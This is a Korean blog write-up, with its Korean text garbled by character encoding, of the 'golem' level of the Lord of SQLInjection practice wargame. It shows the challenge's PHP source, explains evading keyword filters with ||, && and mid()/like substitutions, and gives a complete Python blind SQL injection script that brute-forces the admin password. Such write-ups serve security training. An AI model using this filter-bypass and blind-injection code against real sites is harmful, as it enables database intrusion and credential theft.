Security Mode

wargame ๐Ÿด‍โ˜ ๏ธ write-up/Lord of SQLInjection

golem

Kortsec1 2022. 4. 2. 17:54 
<?php 
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
  if(preg_match('/or|and|substr\(|=/i', $_GET[pw])) exit("HeHe"); 
  $query = "select id from prob_golem where id='guest' and pw='{$_GET[pw]}'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_golem where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("golem"); 
  highlight_file(__FILE__); 
?>

or, and, substr(, =๋ฅผ ์ถ”๊ฐ€์ ์œผ๋กœ ํ•„ํ„ฐ๋งํ•œ๋‹ค.

๊ฐ๊ฐ ||, &&, mid(, like๋กœ ์šฐํšŒํ•˜๋ฉด ๊ฐ„๋‹จํžˆ ํ’€๋ฆฐ๋‹ค.

 

ํ•ด๋‹น ๋ฌธ์ œ๋Š” blind-sqli๋ฌธ์ œ๋กœ ์ •ํ™•ํ•œ pw๊ฐ’์„ ์ฐพ์•„๋‚ด์•ผ ํ•œ๋‹ค.

 

2022.04.02 - [wargame write-up/Lord of SQLInjection] - orc

 

orc

<?php include "./config.php"; login_chk(); $db = dbconnect(); if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); $query = "select id from prob_orc where id='admin' and pw='{$_GET[pw..

kortsec1n4mationm.tistory.com

orc์—์„œ ๋งŒ๋“  python code์—์„œ or, and, substr(, =๋ฅผ ๋ฐ”๊พธ์–ด ์ƒˆ๋กœ ์ž‘์„ฑํ•ด๋ณด์ž.

 

import requests

cookies = {'PHPSESSID' : 'asdfasdfasdfasdf'}

print("finding length of pw...")
for i in range(1,100):
    url = 'https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php?pw=1\' || id like \'admin\' %26%26 length(pw) like ' + str(i) + '%23'
    res = requests.get(url, cookies=cookies)
    print(str(i) + " ... ", end="")
    if "Hello admin" in res.text:
        len_pw = i
        print("0")
        print("================================")
        print("len : " + str(i))
        print("================================")
        print("\n")
        break
    else:
        print("X")

full_pw = ""
print("finding full pw...")
for i in range(len_pw):
    for j in range(32, 127):
        url = 'https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php?pw=1\' || id like \'admin\' %26%26 ascii(mid(pw,' + str(i+1) + ', 1)) like ' + str(j) + '%23'
        res = requests.get(url, cookies=cookies)
        if "Hello admin" in res.text:
            full_pw += chr(j)
            break;
    print("pw : " + full_pw)
print("================================")
print("pw : " + full_pw)
print("================================")

 

์‹คํ–‰์‹œํ‚จ๋’ค, ๊ฒฐ๊ณผ๋ฅผ pw๊ฐ’์œผ๋กœ ๋„˜๊ฒจ์ฃผ๋ฉด ๋

 

๊ทธ๋ฆผ1 ํ”„๋กœ๊ทธ๋žจ ์‹คํ–‰

๋‘๊ตฌ๋‘๊ตฌ

๊ทธ๋ฆผ2 ์„ฑ๊ณต

'wargame ๐Ÿดโ€โ˜ ๏ธ write-up > Lord of SQLInjection' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

bugbear  (0) 2023.07.30
darkknight  (0) 2022.04.02
skeleton  (0) 2022.04.02
vampire  (0) 2022.04.02

'wargame ๐Ÿด‍โ˜ ๏ธ write-up/Lord of SQLInjection'์˜ ๋‹ค๋ฅธ๊ธ€

  • ํ˜„์žฌ๊ธ€golem

๊ด€๋ จ๊ธ€

ํ‹ฐ์Šคํ† ๋ฆฌํˆด๋ฐ”